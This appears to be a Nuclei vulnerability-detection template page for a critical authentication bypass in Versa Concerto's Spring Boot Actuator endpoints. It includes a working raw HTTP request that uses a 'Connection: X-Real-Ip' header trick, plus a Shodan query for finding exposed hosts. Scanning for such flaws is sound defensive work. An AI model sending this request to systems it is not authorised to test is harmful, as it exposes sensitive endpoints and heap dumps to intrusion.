Versa Concerto Actuator Endpoint - Authentication Bypass
versa-concerto-actuators-auth-bypass
Verified
Description
An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
Severity
Critical
Affected Product
concerto
Published Date
May 21, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
versa-concerto-actuators-auth-bypass.yaml
id: versa-concerto-actuators-auth-bypass
info:
name: Versa Concerto Actuator Endpoint - Authentication Bypass
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
reference:
- https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
- https://versa-networks.com/documents/datasheets/versa-concerto.pdf
classification:
cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: versa-networks
product: concerto
max-request: 1
shodan-query: http.favicon.hash:-534530225
tags: versa,concerto,actuator,auth-bypass,spring-boot
http:
- raw:
- |
GET /portalapi/actuator HTTP/1.1
Host: {{Hostname}}
Connection: X-Real-Ip
matchers-condition: and
matchers:
- type: word
part: body
words:
- heapdump
- type: word
part: header
words:
- EECP-CSRF-TOKEN
# digest: 490a00463044022038fd02f6d0577de6b6607f4a84a0ac4f3f09ba517dbd46b845b37ffde9def76e02203c25490dcbad22fafdf7759440adb75c6e08227b90f384718443e5ab9895370e:922c64590222798bb761d5b6d8e72950